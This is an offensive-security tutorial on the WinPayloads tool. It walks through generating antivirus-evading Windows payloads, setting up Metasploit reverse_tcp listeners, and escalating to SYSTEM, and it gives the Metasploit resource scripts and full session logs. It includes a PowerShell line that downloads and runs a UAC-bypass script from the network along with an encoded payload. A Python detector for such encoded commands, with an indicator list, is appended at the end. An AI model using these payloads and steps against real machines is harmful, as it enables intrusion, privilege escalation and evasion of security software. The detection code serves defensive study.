
WinPayloads Tutorial | Automated Payload and Listener Setup


Automated Payload Generation and Server Setup with WinPayloads


Once again with a little help from PowerShell Empire, we introduce WinPayloads, another useful tool for quickly generating undetectable payloads (with integrated Shellter), setting up Metasploit and automatically performing privilege escalation on the target.

Below is a breakdown of the process of running WinPayloads:

1. cd into the WinPayloads directory.
2. Execute “python WinPayloads.py”.
3. Choose your option.
4. Specify the port.
5. Let the tool detect your local IP (or give it your external IP for WAN attacks).
6. It then lets you decide whether you want to elevate your privileges on the target system.
7. Next you have the option to embed your payload into an unsuspicious PE (portable executable) with the help of Shellter.
8. At this point you can decide whether to start a local web server (Python's SimpleHTTPServer), attack via PsExec, or save the payload for later.
9. msfconsole is now started and presents the matching listener. All you have to do is give the target system the URL specified by the tool (or the file at that URL) and wait for the trojan to be executed.

From this point on the tool does its magic, meaning it exploits, migrates and elevates. In my testing Avast was kind enough to scan the “unknown” file, only to tell me after 15 seconds that everything was okay and I could go on.

Below is how the process performed by WinPayloads could be completed manually.

winpayloads breakdown


1. Create “bypassuac.ps1”, “uacbypass.rc”, “uacbypass2.rc”

1.1 Runs bypassuac.ps1 (Base64-encoded)

IEX (New-Object Net.WebClient).DownloadString("https://github.com/PowerShellEmpire/Empire/raw/master/data/module_source/privesc/Invoke-BypassUAC.ps1");
Invoke-BypassUAC -Command "powershell -enc JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBw
.....snip.....
IAOwBpAGUAeAAgACIAJgAgACQAMwAgACQAMgAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAb
ABsACAAJAAyACAAJABlACIAOwB9AA==" 


1.2 Runs uacbypass.rc

run post/windows/manage/migrate SESSION=1 NAME=explorer.exe SPAWN=false KILL=false
run post/windows/manage/exec_powershell SCRIPT=bypassuac.ps1 SESSION=1


1.3 Runs uacbypass2.rc

run post/windows/manage/migrate SESSION=2 NAME=spoolsv.exe SPAWN=false KILL=false
run post/windows/escalate/getsystem SESSION=2


2. Starts Msfconsole

       =[ metasploit v4.11.5-2015121501                   ]
+ -- --=[ 1517 exploits - 871 auxiliary - 256 post        ]
+ -- --=[ 436 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

payload => windows/meterpreter/reverse_tcp
LPORT => 4444
LHOST => 0.0.0.0
autorunscript => multi_console_command -rc uacbypass.rc
ExitOnSession => false
[*]Exploit running as background job.
LPORT => 4445
[*]Started reverse handler on 0.0.0.0:4444 
autorunscript => multi_console_command -rc uacbypass2.rc
[*]Exploit running as background job.

[*]Started reverse handler on 0.0.0.0:4445 
[*]Starting the payload handler...
msf exploit(handler) >
[*]Starting the payload handler...


3. The executable is downloaded from the local web server

192.168.1.118 - - [11/Jan/2016 19:50:23] "GET /ReverseWindowsMeterpreter.exe HTTP/1.1" 200 -


4. The payload is executed and the autorun scripts migrate, run bypassuac.ps1 and call getsystem

[*]Sending stage (957487 bytes) to 192.168.1.118
[*]Meterpreter session 1 opened (192.168.1.111:4444 -> 192.168.1.118:49741) at 2016-01-11 19:51:50 +0100
[*]Session ID 1 (192.168.1.111:4444 -> 192.168.1.118:49741) processing AutoRunScript 'multi_console_command -rc uacbypass.rc'
[*]Running Command List ...
[*]    Running command run post/windows/manage/migrate SESSION=1 NAME=explorer.exe SPAWN=false KILL=false
[*]Running module against WIN10-VICTIM
[*]Current server process: ReverseWindowsMeterpreter.exe (6736)
[+] Migrating to 2828
[+] Successfully migrated to process 2828
[*]    Running command run post/windows/manage/exec_powershell SCRIPT=bypassuac.ps1 SESSION=1
[+] Compressed size: 8032
[*]#< CLIXML

[+] Finished!
[*]Sending stage (957487 bytes) to 192.168.1.118
[*]Meterpreter session 2 opened (192.168.1.111:4445 -> 192.168.1.118:49744) at 2016-01-11 19:52:33 +0100
[*]Session ID 2 (192.168.1.111:4445 -> 192.168.1.118:49744) processing AutoRunScript 'multi_console_command -rc uacbypass2.rc'
[*]Running Command List ...
[*]    Running command run post/windows/manage/migrate SESSION=2 NAME=spoolsv.exe SPAWN=false KILL=false
[*]Running module against WIN10-VICTIM
[*]Current server process: powershell.exe (6296)
[+] Migrating to 1764
[+] Successfully migrated to process 1764
[*]    Running command run post/windows/escalate/getsystem SESSION=2
[+] This session already has SYSTEM privileges


5. Metasploit opens 2 sessions (1 – Normal | 2 – Elevated)

sessions

Active sessions
===============

  Id  Type                   Information                                   Connection
  --  ----                   -----------                                   ----------
  1   meterpreter x64/win64  WIN10-VICTIM\Straight Shooter @ WIN10-VICTIM  192.168.1.111:4444 -> 192.168.1.118:49741 (192.168.1.118)
  2   meterpreter x64/win64  WIN10-VICTIM\Straight Shooter @ WIN10-VICTIM  192.168.1.111:4445 -> 192.168.1.118:49744 (192.168.1.118)

msf exploit(handler) >
[*]

6. getuid on session 2

msf exploit(handler) > sessions -i 2
[*]Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >


7. getsystem on session 2


meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >


For testing we used Kali 2.0 as the attacking machine and a Windows 10 (64-bit) machine with a fully up-to-date Avast as the defending machine.
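As an added defender-side example (not part of the original post and not WinPayloads' own code): step 1.1 launches the UAC bypass as `powershell -enc <Base64>` wrapping an `IEX (New-Object Net.WebClient).DownloadString(...)` cradle, which is exactly what a process-creation log records. The script below decodes the `-EncodedCommand` argument (Base64 over UTF-16LE, any unambiguous prefix such as `-enc` accepted) from constructed command lines and flags the cradle and Invoke-BypassUAC indicators; the sample lines and the `example.invalid` URL are constructed.

```python
import base64
import binascii
import re
from typing import Optional

# Constructed sample process-creation command lines (the kind Sysmon event 1 or
# Windows event 4688 records). The first mimics the bypassuac.ps1 stage shown in
# the post; the other two are benign. The URL is a constructed placeholder.
CRADLE = ('IEX (New-Object Net.WebClient).DownloadString('
          '"https://example.invalid/Invoke-BypassUAC.ps1"); '
          'Invoke-BypassUAC -Command "powershell -enc <snipped>"')

def encode_ps(script: str) -> str:
    """Encode a script the way powershell -enc expects: Base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

SAMPLE_COMMAND_LINES = [
    "powershell -enc " + encode_ps(CRADLE),
    "powershell -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
    "powershell -EncodedCommand " + encode_ps("Get-Date"),
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match any -e... switch followed by a Base64 token and check the prefix below.
FLAG_RE = re.compile(r"-([eE]\w*)\s+([A-Za-z0-9+/=]+)")
INDICATORS = ("DownloadString", "Net.WebClient", "IEX",
              "Invoke-Expression", "Invoke-BypassUAC")

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if absent or malformed."""
    for m in FLAG_RE.finditer(cmdline):
        if not "encodedcommand".startswith(m.group(1).lower()):
            continue  # some other switch, e.g. -ExecutionPolicy
        try:
            return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            return None  # bad padding or odd byte count: not a valid encoded command
    return None

def analyze(cmdline: str) -> dict:
    """Flag command lines whose (decoded) script carries cradle or UAC-bypass indicators."""
    decoded = decode_encoded_command(cmdline)
    script = decoded if decoded is not None else cmdline
    hits = [i for i in INDICATORS if i.lower() in script.lower()]
    return {"encoded": decoded is not None, "decoded": decoded,
            "indicators": hits, "suspicious": bool(hits)}

def scan(cmdlines) -> list:
    """Return only the suspicious command lines, each paired with its analysis."""
    return [(c, analyze(c)) for c in cmdlines if analyze(c)["suspicious"]]
```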
